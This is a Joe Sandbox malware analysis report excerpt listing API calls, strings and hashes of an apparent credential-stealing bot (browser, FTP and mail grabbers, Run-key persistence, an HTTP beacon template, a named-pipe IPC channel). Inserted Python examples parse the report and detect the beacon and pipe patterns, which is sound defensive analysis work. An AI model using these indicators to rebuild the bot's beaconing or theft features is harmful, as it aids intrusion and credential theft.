  • Part of subcall function 00407500: lstrlenA.KERNEL32(?), ref: 0040752B
  • Part of subcall function 00407500: _snprintf.MSVCRT ref: 00407547
  • Part of subcall function 00407500: _vsnprintf.MSVCRT ref: 00407569
  • Part of subcall function 00407500: lstrcmpA.KERNEL32(?,bdns), ref: 0040758B
  • Part of subcall function 00407500: StrStrIA.SHLWAPI(?,00000000), ref: 0040759F
  • Part of subcall function 00407500: lstrlenA.KERNEL32(?), ref: 004075B9
Strings
Memory Dump Source
• Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_25F.jbxd
Similarity
• API ID: lstrlen$_snprintfmemset$_vsnprintflstrcmplstrcpy
• String ID: bdns$ffgrab$ftpgrab$http$httpi$iegrab$int$msg$msn$msnu$pdef$popgrab$usbi
• API String ID: 3955240783-2907616027
APIs
• memset.MSVCRT ref: 0036A89E
  • Part of subcall function 00367790: memset.MSVCRT ref: 003677AE
  • Part of subcall function 00367790: memset.MSVCRT ref: 003677C8
  • Part of subcall function 00367790: lstrcpyA.KERNEL32(00000000,off), ref: 003677F0
  • Part of subcall function 00367790: _snprintf.MSVCRT ref: 0036780D
  • Part of subcall function 00367790: lstrlenA.KERNEL32(00000000), ref: 00367822
  • Part of subcall function 00367790: lstrlenA.KERNEL32(00000000), ref: 00367858
• _snprintf.MSVCRT ref: 0036A936
  • Part of subcall function 00367500: lstrlenA.KERNEL32(?), ref: 0036752B
  • Part of subcall function 00367500: _snprintf.MSVCRT ref: 00367547
  • Part of subcall function 00367500: _vsnprintf.MSVCRT ref: 00367569
  • Part of subcall function 00367500: lstrcmpA.KERNEL32(?,bdns), ref: 0036758B
  • Part of subcall function 00367500: StrStrIA.SHLWAPI(?,00000000), ref: 0036759F
  • Part of subcall function 00367500: lstrlenA.KERNEL32(?), ref: 003675B9
Strings
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: lstrlen$_snprintfmemset$_vsnprintflstrcmplstrcpy
• String ID: bdns$ffgrab$ftpgrab$http$httpi$iegrab$int$msg$msn$msnu$pdef$popgrab$usbi
• API String ID: 3955240783-2907616027
APIs
• memset.MSVCRT ref: 0040180E
• memset.MSVCRT ref: 00401829
• wcsstr.MSVCRT ref: 00401842
• lstrcmpA.KERNEL32(00000000,block), ref: 00401888
• strstr.MSVCRT ref: 00401898
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000208), ref: 004018B7
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000104,00000000,00000000), ref: 00401905
Strings
Memory Dump Source
• Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_25F.jbxd
Similarity
• API ID: ByteCharMultiWidememset$lstrcmpstrstrwcsstr
• String ID: %s.%S$bdns$block$brk$rdns
• API String ID: 695720605-4000218262
APIs
• memset.MSVCRT ref: 0036180E
• memset.MSVCRT ref: 00361829
• wcsstr.MSVCRT ref: 00361842
• lstrcmpA.KERNEL32(00000000,block), ref: 00361888
• strstr.MSVCRT ref: 00361898
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000208), ref: 003618B7
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000104,00000000,00000000), ref: 00361905
Strings
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: ByteCharMultiWidememset$lstrcmpstrstrwcsstr
• String ID: %s.%S$bdns$block$brk$rdns
• API String ID: 695720605-4000218262
APIs
• memset.MSVCRT ref: 004010C0
• lstrcmpW.KERNEL32(?,0044ADA0), ref: 004010D7
• lstrcmpW.KERNEL32(?,0044A710), ref: 0040111D
• MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00401127
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104,00000000,00000000), ref: 00401161
• lstrcpyA.KERNEL32(00416D88,00000000), ref: 00401179
• lstrcpyA.KERNEL32(00000000,00411335), ref: 00401187
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104,00000000,00000000), ref: 004011A0
• lstrcpyA.KERNEL32(00416E90,00000000), ref: 004011B3
  • Part of subcall function 00407700: memset.MSVCRT ref: 0040771E
  • Part of subcall function 00407700: _snprintf.MSVCRT ref: 00407738
  • Part of subcall function 00407700: lstrlenA.KERNEL32(00000000), ref: 00407747
Strings
Memory Dump Source
• Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_25F.jbxd
Similarity
• API ID: lstrcpy$ByteCharMultiWidelstrcmpmemset$FileMove_snprintflstrlen
• String ID: %s.%S$pdef$ruskill
• API String ID: 1230166232-1410347113
APIs
• memset.MSVCRT ref: 003610C0
• lstrcmpW.KERNEL32(?,003AADA0), ref: 003610D7
• lstrcmpW.KERNEL32(?,003AA710), ref: 0036111D
• MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00361127
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104,00000000,00000000), ref: 00361161
• lstrcpyA.KERNEL32(00376D88,00000000), ref: 00361179
• lstrcpyA.KERNEL32(00000000,00371335), ref: 00361187
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104,00000000,00000000), ref: 003611A0
• lstrcpyA.KERNEL32(00376E90,00000000), ref: 003611B3
  • Part of subcall function 00367700: memset.MSVCRT ref: 0036771E
  • Part of subcall function 00367700: _snprintf.MSVCRT ref: 00367738
  • Part of subcall function 00367700: lstrlenA.KERNEL32(00000000), ref: 00367747
Strings
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: lstrcpy$ByteCharMultiWidelstrcmpmemset$FileMove_snprintflstrlen
• String ID: %s.%S$pdef$ruskill
• API String ID: 1230166232-1410347113
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_25F.jbxd
Similarity
• API ID: _vsnprintflstrlenmemset$_memicmp_snprintf
• String ID: %s.%s$%s_$blk$block
• API String ID: 3657324510-3589362310
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_360000_25F.jbxd
Similarity
• API ID: _vsnprintflstrlenmemset$_memicmp_snprintf
• String ID: %s.%s$%s_$blk$block
• API String ID: 3657324510-3589362310
                                                                  • Opcode ID: 8ec815edb3d7ef0f5650a5b99d74dfb188bacf20701c102f680c0e481b745799
                                                                  • Instruction ID: 78c4405644adff30dfdb7592f11d1775d1ca0444fa21cc2ba795f0e9b637c2f6
                                                                  • Opcode Fuzzy Hash: 8ec815edb3d7ef0f5650a5b99d74dfb188bacf20701c102f680c0e481b745799
                                                                  • Instruction Fuzzy Hash: F0213FB694020D7AE722EA59DC82FFB33ACDB44714F44C5A8FA0CA7141EA749E4547A0
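Added example, not part of the Joe Sandbox report: a small Python parser for the function blocks in this section. Most functions here are listed twice, once per memory dump (Source File offset 00400000 and offset 00360000), with identical API ID / String ID / API String ID but different Opcode and Instruction IDs. The parser folds such a pair into one record keyed by API String ID and checks that the API reference addresses of the pair differ by exactly the image-base delta (0x400000 - 0x360000 = 0xA0000). SAMPLE is a constructed, trimmed excerpt in the page's layout (the GetTickCount/select function as it appears in both dumps); the function and field names in the code are the example's own.

```python
"""Parse the per-function blocks of a Joe Sandbox report text export (the
APIs / Strings / Memory Dump Source / Similarity layout used on this page)
and fold one function seen in several memory dumps into a single record
keyed by its "API String ID".

Added example, not part of the report or of Joe Sandbox. SAMPLE is a
constructed, trimmed two-block excerpt in the page's layout: the
GetTickCount/select function as seen in the 0x400000 and 0x360000 dumps."""
import re
from collections import defaultdict

SAMPLE = """\
APIs
• GetTickCount.KERNEL32 ref: 00408292
  • Part of subcall function 004081C0: WSAStartup.WS2_32(00000202,?), ref: 004081E3
• select.WS2_32(00000000,00000000,?,00000000,?), ref: 00408314
Memory Dump Source
• Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CountTick$Startupselect
• API String ID: 3882035529-0
• Opcode ID: 85fd59747fc3b1c661cce8175a3d351750ef0b52ceea1d2a7c6e5893856a6c4a
APIs
• GetTickCount.KERNEL32 ref: 00368292
  • Part of subcall function 003681C0: WSAStartup.WS2_32(00000202,?), ref: 003681E3
• select.WS2_32(00000000,00000000,?,00000000,?), ref: 00368314
Memory Dump Source
• Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
Similarity
• API ID: CountTick$Startupselect
• API String ID: 3882035529-0
• Opcode ID: 67d605d7d4f21b641fd4e26498f51e5d61285701a36c3e7f5d9f37b875a8d93e
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.Module(args), ref: ADDR"; args are optional, subcall lines carry a prefix.
API_RE = re.compile(r"(\w+)\.(\w+)(?:\([^)]*\))?.*?ref: ([0-9A-Fa-f]{8})")
STRING_RE = re.compile(r"•\s*(.*), xrefs: ([0-9A-Fa-f]{8})")
KV_RE = re.compile(r"•\s*([^:]+):\s*(.*)")


def parse_blocks(text):
    """Split the export into blocks; one block starts at every 'APIs' header."""
    blocks, block, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                block = {"apis": [], "strings": [], "fields": {}}
                blocks.append(block)
            section = line
            continue
        if block is None:
            continue
        if section == "APIs":
            m = API_RE.search(line)
            if m:
                block["apis"].append({"name": m.group(1), "module": m.group(2),
                                      "ref": m.group(3),
                                      "subcall": "Part of subcall" in line})
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                block["strings"].append((m.group(1), m.group(2)))
        else:
            m = KV_RE.match(line)
            if m:
                block["fields"][m.group(1).strip()] = m.group(2).strip()
    return blocks


def dump_offset(block):
    """Image base of the memory dump the block was lifted from."""
    m = re.search(r"Offset: ([0-9A-Fa-f]+)", block["fields"].get("Source File", ""))
    return m.group(1) if m else None


def fold_by_api_string_id(blocks):
    """Same API+string signature in several dumps -> one record. The Opcode IDs
    differ between the two dumps on this page, so they are collected, not compared."""
    groups = defaultdict(lambda: {"api_id": None, "dumps": set(), "opcode_ids": set(),
                                  "apis": set(), "subcall_apis": set(), "strings": set()})
    for b in blocks:
        key = b["fields"].get("API String ID")
        if not key:
            continue
        g = groups[key]
        g["api_id"] = b["fields"].get("API ID")
        g["dumps"].add(dump_offset(b))
        g["opcode_ids"].add(b["fields"].get("Opcode ID"))
        for a in b["apis"]:
            (g["subcall_apis"] if a["subcall"] else g["apis"]).add(f"{a['name']}.{a['module']}")
        g["strings"].update(s for s, _ in b["strings"])
    return dict(groups)


def rebased_delta(b1, b2):
    """Consistency check for a folded pair: every API ref in one dump must equal
    the other's ref shifted by the difference of the image bases. Returns that
    delta when it holds for all refs, else None."""
    delta = int(dump_offset(b1), 16) - int(dump_offset(b2), 16)
    refs1 = [int(a["ref"], 16) for a in b1["apis"]]
    refs2 = [int(a["ref"], 16) for a in b2["apis"]]
    if len(refs1) != len(refs2):
        return None
    return delta if all(r1 - r2 == delta for r1, r2 in zip(refs1, refs2)) else None
```

Run it against the full text export of a report to get one record per function instead of one per dump; `rebased_delta` returning None for a pair with the same API String ID is worth a manual look, since it means the two listings are not simply the same code at two bases.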
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: memset$lstrcpy$CountTicksprintfstrtok
                                                                  • String ID: %s / ?%d HTTP/1.1Host: %sUser-Agent: %sKeep-Alive: 300Connection: keep-aliveContent-Length: 42$GET$Mozilla/4.0$POST
                                                                  • API String ID: 3318893083-109246470
                                                                  • Opcode ID: ab8c1bc6b042fd2f554f543c151083597909fae3e40bddd3ea1445c51ee56114
                                                                  • Instruction ID: a58238f94dc203fc7a4291ccda806a9fd0a954f169f11a3db57d908f1604fe94
                                                                  • Opcode Fuzzy Hash: ab8c1bc6b042fd2f554f543c151083597909fae3e40bddd3ea1445c51ee56114
                                                                  • Instruction Fuzzy Hash: 06212DF29402186AC714E769CD42FDA736C9BA8704F00459BF308B21C1D6F8AFC48A6C
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: memset$lstrcpy$CountTicksprintfstrtok
                                                                  • String ID: %s / ?%d HTTP/1.1Host: %sUser-Agent: %sKeep-Alive: 300Connection: keep-aliveContent-Length: 42$GET$Mozilla/4.0$POST
                                                                  • API String ID: 3318893083-109246470
                                                                  • Opcode ID: b08fe21d9414c3fcabf9b8713482819aac44f78b313de411a617f3f36387d9ac
                                                                  • Instruction ID: 46f88dac0910a650fb4a8c36ef33eec2eac0c80e771e804df30f6ccca82bcf18
                                                                  • Opcode Fuzzy Hash: b08fe21d9414c3fcabf9b8713482819aac44f78b313de411a617f3f36387d9ac
                                                                  • Instruction Fuzzy Hash: 58212EB69402186AD73BD764CC86FEA736C9FA9710F04C585F30DA6085D6F4ABC48B61
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00408292
                                                                  • GetTickCount.KERNEL32 ref: 004082A8
                                                                    • Part of subcall function 004081C0: WSAStartup.WS2_32(00000202,?), ref: 004081E3
                                                                  • select.WS2_32(00000000,00000000,?,00000000,?), ref: 00408314
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Startupselect
                                                                  • String ID:
                                                                  • API String ID: 3882035529-0
                                                                  • Opcode ID: 85fd59747fc3b1c661cce8175a3d351750ef0b52ceea1d2a7c6e5893856a6c4a
                                                                  • Instruction ID: 4b61705fb868fa9baa08715d210e5fb779858df6dc90d303a1a16509d1b594dd
                                                                  • Opcode Fuzzy Hash: 85fd59747fc3b1c661cce8175a3d351750ef0b52ceea1d2a7c6e5893856a6c4a
                                                                  • Instruction Fuzzy Hash: 62A1DBB1900604ABC734DF69D981AEBB7E8EF44314F00492FE68D97281E779A9818B95
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00368292
                                                                  • GetTickCount.KERNEL32 ref: 003682A8
                                                                    • Part of subcall function 003681C0: WSAStartup.WS2_32(00000202,?), ref: 003681E3
                                                                  • select.WS2_32(00000000,00000000,?,00000000,?), ref: 00368314
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Startupselect
                                                                  • String ID:
                                                                  • API String ID: 3882035529-0
                                                                  • Opcode ID: 67d605d7d4f21b641fd4e26498f51e5d61285701a36c3e7f5d9f37b875a8d93e
                                                                  • Instruction ID: 6bd779b523b20719365a77ca8c76f6c65e202ba8e446b0596368e3e5b2702e20
                                                                  • Opcode Fuzzy Hash: 67d605d7d4f21b641fd4e26498f51e5d61285701a36c3e7f5d9f37b875a8d93e
                                                                  • Instruction Fuzzy Hash: B7A1F9B1900604ABC735DF68D881AEBB3F8EF49314F00C61DF68EC7645DB75A9858BA1
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00406F91
                                                                  • lstrcpyA.KERNEL32(00000000,HKCU\), ref: 00406FFE
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000400), ref: 00407017
                                                                  • _wcsnicmp.MSVCRT ref: 00407061
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide_wcsnicmplstrcpymemset
                                                                  • String ID: %S%s%s$%s.%s%s$HKCU\$HKLM\$Software\Microsoft\Windows\CurrentVersion\Run$brk$rreg
                                                                  • API String ID: 2911520168-3007424447
                                                                  • Opcode ID: 24fe703b4de6350d17fbfb4750cd8bb4c3951149c9ffddb89d5d1c17b520efb2
                                                                  • Instruction ID: 52cdffd3aed9817ff0f5470690bd97fa8b38541f7e8b3e480f67bf3efe9e444e
                                                                  • Opcode Fuzzy Hash: 24fe703b4de6350d17fbfb4750cd8bb4c3951149c9ffddb89d5d1c17b520efb2
                                                                  • Instruction Fuzzy Hash: D241A5B1B54218BBDB10CF95DC42FEF77ACAB58714F10412BFA04F2281E678A9508769
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00366F91
                                                                  • lstrcpyA.KERNEL32(00000000,HKCU\), ref: 00366FFE
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000400), ref: 00367017
                                                                  • _wcsnicmp.MSVCRT ref: 00367061
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide_wcsnicmplstrcpymemset
                                                                  • String ID: %S%s%s$%s.%s%s$HKCU\$HKLM\$Software\Microsoft\Windows\CurrentVersion\Run$brk$rreg
                                                                  • API String ID: 2911520168-3007424447
                                                                  • Opcode ID: 0d45d3b2ba07d0a4a0618b33501e6458a9cbacb258cddf956ad6d2cd269dfc33
                                                                  • Instruction ID: 56029d94d50216742f54f4b340fdfa432c3bc340f62fbbf4362b17196c786093
                                                                  • Opcode Fuzzy Hash: 0d45d3b2ba07d0a4a0618b33501e6458a9cbacb258cddf956ad6d2cd269dfc33
                                                                  • Instruction Fuzzy Hash: 3D41C4B2A50208BBDB22CB94DC42EFE77BCEB59714F048119FA08E7285E674994087B5
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040E8A0
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0040E8AD
                                                                  • _snprintf.MSVCRT ref: 0040E8D0
                                                                  • CreateNamedPipeA.KERNEL32(00000000,00000003,00000006,000000FF,00000800,00000800,00001388,00000000), ref: 0040E8FF
                                                                  • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 0040E913
                                                                  • GetLastError.KERNEL32 ref: 0040E91D
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000D7A0,00000000,00000000,00000000), ref: 0040E941
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E94B
                                                                  • CreateNamedPipeA.KERNEL32(00000000,00000003,00000006,000000FF,00000800,00000800,00001388,00000000), ref: 0040E96E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateNamedPipe$CloseConnectErrorHandleLastThread_snprintflstrlenmemset
                                                                  • String ID: 30e44aa1$\\.\pipe\%08x_ipc
                                                                  • API String ID: 4065143564-1096776489
                                                                  • Opcode ID: e693463ca9314ef0d474e7815daa56aeeb6a66ebd1abb46cdd44f1c84a99d209
                                                                  • Instruction ID: 85e23c8102626b95d66f369786d20e7ea1e1dc74d471df5540707f019a3fc3e2
                                                                  • Opcode Fuzzy Hash: e693463ca9314ef0d474e7815daa56aeeb6a66ebd1abb46cdd44f1c84a99d209
                                                                  • Instruction Fuzzy Hash: 172135B1BC03147AF33063658C47FEA7618AB54F10F248676FB04FA0D0DAF4694446AC
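Added example, not code from the sample or from Joe Sandbox, covering two artefacts listed in the function blocks above: the HTTP request template `%s / ?%d HTTP/1.1Host: %sUser-Agent: %sKeep-Alive: 300Connection: keep-aliveContent-Length: 42` with its `GET`, `POST` and `Mozilla/4.0` companions, and the IPC pipe name template `\\.\pipe\%08x_ipc`. The report prints the HTTP template with its line breaks stripped; the CRLF separators the example re-inserts are an assumption. The detection functions flag a request that carries all of the template's traits at once (a request target of the `/?<number>` shape, a bare `Mozilla/4.0` user agent, `Keep-Alive: 300`, `Connection: keep-alive` and a fixed `Content-Length: 42` even on GET) and filter a pipe listing down to names of the `%08x_ipc` shape. All requests and pipe names used as input are constructed test data, and the `%d` value and hostnames are placeholders, not values taken from the sample.

```python
"""Detection helpers for two artefacts listed in the function blocks above:
the HTTP request template ("%s / ?%d HTTP/1.1 ... Content-Length: 42", with
GET/POST and the bare "Mozilla/4.0" user agent) and the IPC pipe name
template "\\\\.\\pipe\\%08x_ipc".

Added example, not code from the sample or from Joe Sandbox. The report
prints the template with its line breaks stripped; the CRLF separators and
the trailing blank line below are an ASSUMPTION. All requests and pipe
names used as input are constructed test data, not captured traffic."""
import re

# Template as listed in the report, CRLF re-inserted (assumption).
TEMPLATE = ("%s / ?%d HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\n"
            "Keep-Alive: 300\r\nConnection: keep-alive\r\nContent-Length: 42\r\n\r\n")

# The dump shows "/ ?%d"; tolerate the target with or without that space.
REQUEST_LINE = re.compile(r"^(GET|POST) / ?\?(\d+) HTTP/1\.1$")
# "%08x" yields exactly eight lower-case hex digits.
PIPE_RE = re.compile(r"^\\\\\.\\pipe\\[0-9a-f]{8}_ipc$")


def build_request(method, n, host, user_agent="Mozilla/4.0"):
    """What the template produces for one request; 'n' stands in for the
    %d value, which this example does not derive from the sample."""
    return TEMPLATE % (method, n, host, user_agent)


def parse_request(raw):
    """Split a raw request into (request-line match, lower-cased header dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return REQUEST_LINE.match(lines[0]), headers


def matches_beacon_template(raw):
    """(True, []) when every trait of the template is present, otherwise
    (False, [names of the traits that were missing])."""
    req, headers = parse_request(raw)
    traits = {
        "request_line": req is not None,
        "ua_bare_mozilla40": headers.get("user-agent") == "Mozilla/4.0",
        "keep_alive_300": headers.get("keep-alive") == "300",
        "connection_keep_alive": headers.get("connection", "").lower() == "keep-alive",
        # fixed in the template, even for GET
        "content_length_42": headers.get("content-length") == "42",
    }
    missing = [name for name, ok in traits.items() if not ok]
    return (not missing, missing)


def suspicious_pipes(names):
    """Filter a listing of \\\\.\\pipe\\ entries down to the %08x_ipc shape."""
    return [n for n in names if PIPE_RE.match(n)]


if __name__ == "__main__":
    beacon = build_request("POST", 7, "c2.example.invalid")  # constructed
    print(matches_beacon_template(beacon))
    print(suspicious_pipes([r"\\.\pipe\lsass", r"\\.\pipe\1a2b3c4d_ipc",
                            r"\\.\pipe\abc_ipc"]))
```

Requiring all five traits together keeps the network check from firing on ordinary `Mozilla/4.0` clients; a single trait such as `Keep-Alive: 300` is common on its own. The pipe check only matches the name shape, so a hit should be tied back to the owning process before it is acted on.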
                                                                  APIs
                                                                  • LdrEnumerateLoadedModules.NTDLL(00000000,00405040,g\@), ref: 00405B0D
                                                                  • CreateThread.KERNEL32(00000000,00000000,00405070,00000000,00000000,00000000), ref: 00405C03
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405C0A
                                                                  • CreateThread.KERNEL32(00000000,00000000,004050F0,00000000,00000000,00000000), ref: 00405C3D
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405C44
                                                                    • Part of subcall function 00403920: RtlAnsiStringToUnicodeString.NTDLL(?,?,00000000), ref: 00403962
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleStringThread$AnsiEnumerateLoadedModulesUnicode
                                                                  • String ID: LdrLoadDll$NtResumeThread$g\@$g\@$ntdll.dll
                                                                  • API String ID: 1691487058-1858031983
                                                                  • Opcode ID: 15177fe99cea3c95e7436bba47e17e1593aa2991ecdead64e05b4e770913e227
                                                                  • Instruction ID: d2a4e14280715d1041b6f2962eb7ad267d111edd4e47b72a6ec2395f63253a1b
                                                                  • Opcode Fuzzy Hash: 15177fe99cea3c95e7436bba47e17e1593aa2991ecdead64e05b4e770913e227
                                                                  • Instruction Fuzzy Hash: A1619DB5740B02ABDB24DF69CC81F6B73A4EB44704F14453AE941AB7D1D678F9018E98
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsnicmplstrcpymemset
                                                                  • String ID: %S%S%S$%s.%S%S$HKCU\$HKLM\$Software\Microsoft\Windows\CurrentVersion\Run$brk$rreg
                                                                  • API String ID: 1531173107-4065158899
                                                                  • Opcode ID: 15fef406b5b0ac02f8dd93d8979f457128f2eb8a91285582a43150cae03d9c6d
                                                                  • Instruction ID: 0d62909f67cd26c4267f5d97f7bb411455192b825f2191604f2d867da3f0bcac
                                                                  • Opcode Fuzzy Hash: 15fef406b5b0ac02f8dd93d8979f457128f2eb8a91285582a43150cae03d9c6d
                                                                  • Instruction Fuzzy Hash: D5310B71E853147AD710DF849C46FEB336CDF98745F10416BFD04B2282E578B99086AE
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsnicmplstrcpymemset
                                                                  • String ID: %S%S%S$%s.%S%S$HKCU\$HKLM\$Software\Microsoft\Windows\CurrentVersion\Run$brk$rreg
                                                                  • API String ID: 1531173107-4065158899
                                                                  • Opcode ID: e3e7edb0a543890e5ba46add6a6594e831ef531ac7ee9f9ae8093df41f508619
                                                                  • Instruction ID: e92308c8f6088221fd27f308028b5a557b0fb31541fa595c3dbeb87617dc812f
                                                                  • Opcode Fuzzy Hash: e3e7edb0a543890e5ba46add6a6594e831ef531ac7ee9f9ae8093df41f508619
                                                                  • Instruction Fuzzy Hash: 72312477A50218BADB22DE48DC86EFB33ACEB58714F008505FD08A2246E6B4AD5087F5
                                                                  APIs
                                                                    • Part of subcall function 004019F0: wcsrchr.MSVCRT ref: 004019F9
                                                                    • Part of subcall function 00407700: memset.MSVCRT ref: 0040771E
                                                                    • Part of subcall function 00407700: _snprintf.MSVCRT ref: 00407738
                                                                    • Part of subcall function 00407700: lstrlenA.KERNEL32(00000000), ref: 00407747
                                                                  • strstr.MSVCRT ref: 004069A8
                                                                  • lstrcmpA.KERNEL32(00416D88,0044AC50,?,?,?,?,?,?), ref: 004069BE
                                                                  • SetFileAttributesA.KERNEL32(00416E90,00000080,?,?,?,?,?,?), ref: 004069D2
                                                                  • DeleteFileA.KERNEL32(00416E90,?,?,?,?,?,?), ref: 004069DD
                                                                  • MoveFileExA.KERNEL32 ref: 004069EC
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A335
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A34F
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A369
                                                                    • Part of subcall function 0040A310: _vsnprintf.MSVCRT ref: 0040A382
                                                                    • Part of subcall function 0040A310: sprintf.MSVCRT ref: 0040A39A
